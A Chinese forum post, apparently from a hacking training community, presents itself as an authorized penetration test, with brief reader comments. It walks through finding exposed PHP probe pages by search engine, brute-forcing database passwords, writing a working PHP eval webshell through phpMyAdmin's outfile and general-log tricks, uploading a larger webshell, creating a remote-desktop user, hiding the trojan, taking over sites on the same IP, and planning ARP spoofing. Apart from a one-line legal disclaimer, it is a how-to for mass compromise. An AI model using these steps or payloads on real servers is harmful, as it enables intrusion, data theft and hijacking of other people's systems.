前言
我今天授权项目上遇到了一个站点,然后成功拿下服务器,我联想到了是否可以通过谷歌与法寻找到更多存在这样问题的网站,然后我简单的一搜索发现有很多,在这里我将分享这次项目的实战过程和经验。
在这里声明一下,大家无论做什么都要遵守中华人民共和国网络安全法,在没有得到授权的情况下是不能这样渗透的

一. 信息收集
- 这里的信息收集比较简单,并不需要繁琐的域名 whois 和端口扫描。
- 我们也不需要费尽心思的去寻找”谷歌镜像站”
- 跟着我打开”www.baidu.com”在其中输入——“PHP探针-UPUPW绿色服务器平台”相关字眼
搜索结果如下:

然后我们随机打开一个网页,页面呈现给我们的内容如下[这里的截图是项目上的网站的内容截图,你们百度找到的也是一样的]:

我们发现该网站底部有的数据库交互功能!
显然 它已经告诉我们该网站的数据库账号 那我们是不是只要爆破出其密码就可以呢(ps:这样的页面通常是没有拦截访问限制的,所以大家可以提高线程去爆破大字典)


此处成功爆破出数据库密码,并且登录成功。[SRC挖掘到这一步就可以提交了,没有授权的话不要去做后面的操作]
二.进入数据库 植入木马
我们在进入数据库之前呢需要将 “当前网站目录”记住(最好记在txt文本里)

然后点击下方的phpMyadmin 进入登录页面 输入账号密码后进入数据库内部

登录后测试一下SQL语句是否可执行

当我们得知SQL语句可执行后 那么我们就要写小马了
select '<?php @eval($_REQUEST[a]);?>'
into outfile "网站根目录//xiaoma.php"


执行成功后看一下能否访问我们的小马

三.菜刀链接

至此我们已经拿到该网站的webshell
但是,后来我感觉这是一个游戏网站,类似于是兄弟就来砍我的那种网游服务器 因为域名就是传奇XX,后来发现不是这个样子的hhh

这其实就可以搞一搞了 说不定能白嫖免费的服务器用呢
四.大马维持权限
- 我想用菜刀浏览一下其他目录里面的文件 去给我提示”执行成功,但是发生错误”
- 一开始我以为是菜刀生锈了,后来发现原因可能并不是这样。
- 既然连接上菜刀 那么我就可以上传大马
- 我从网上随便下了一个大马.py
- 将其修改为dama.php格式,并查看大马的源码 将连接密码修改为”123456”
- 再修改大马的编码格式:改为utf-8 //之前编码格式为gbk存在乱码现象//。


将大马上传至菜刀

连接大马

连接成功

连接成功后依旧没法 进行目录的跳转!!!
所以要想遍历C盘全目录我们还需另寻他法。
五.山重水复疑无路,柳暗花明又一村
我们用大马扫描一下目标服务器开放的端口
注意:这是在内网进行的端口扫描,所以可以绕过防火墙的拦截,扫描出隐藏端口
我们通过端口扫描发现突破口:135,3389端口

不多BB,直接net user一条龙服务走一波。

创建用户:
查看权限为system 直接省略提权过程(是不是很舒服)



远程连接:




拒绝访问,但我感觉应该是用户权限问题
所以我们对AnJian用户进行提权

再次连接:


好吧 明显是台充当服务的虚拟机,然后我们再遍历C盘目录。


小宝贝儿 看你还顽不顽皮
木马隐藏:

虽然被隐藏 但是可以通过杀软扫描出来
那也无所谓啊 谁会在虚拟机安装杀软?
IP反查:




这样我们我们同时拿到3个站点的webshell //其中两个站点挂掉了
拓展一:
我们通过ipconfig -all 和 arp -a 进行探测 获取网关地址 实施ARP欺骗


后面的就是编写ARP欺骗脚本的内容了 如果大家感兴趣 我也可以写一篇有关如何编写ARP欺骗脚本的文章给你们学习哦~
补充:
phpmyadmin通过日志拿webshell
经老师指点,上述方法容易出ERROR1290的错误(是文件导出做了限制。所以在配置中修改限制信息)。
说白了就是不让导出文件,高版本mysql需要修改my.ini才可以利用
所以为了稳妥起见,我们可以用修改日志的方法进行webshell。
下面是我参考别人文章
条件:ROOT权限
进入phpmyadmin后先要把general log设置为ON。

然后将文件修改日志文件名修改,修改成可被容器解析的php文件。
这里他是将日志文件名称修改为def2.php,并且把路径改为网站根目录

然后随便执行一条sql语句。就比如SELECT一个小马。

这样<?php @eval($_REQUEST[a]);?>就被记录在日志中了,而日志又是可被解析PHP文件,所以日志就成了一个小马了
菜刀连接:

本次渗透测试到此就告一段路了,谢谢大家观看 如果觉得不错 请点个赞再走吧~
Track-聂风
发表于 2020-7-30
啥时候有空记得把上一篇的采集代理服务器的文章补充完整
评论列表
加载数据中...
kidll
发表于 2020-7-30
大佬 牛逼
评论列表
加载数据中...
zhangjialu
发表于 2020-7-30
真香~
评论列表
加载数据中...
wl1358042098
发表于 2020-7-31
打卡——>获得权限进入目标桌面
评论列表
加载数据中...
xiaoc
发表于 2020-8-1
加油
评论列表
加载数据中...
tc
发表于 2020-8-1
@楼主,这种漏洞是怎么造成的,是因为PHP探针的问题吗,是不是只要PHP探针删掉就可以防止出现这个漏洞了
评论列表
加载数据中...
杜小孙
发表于 2020-8-2
牛逼哄哄
评论列表
加载数据中...
第十期-五班-空白
发表于 2020-10-14
这个探针怎么使用呀
评论列表
加载数据中...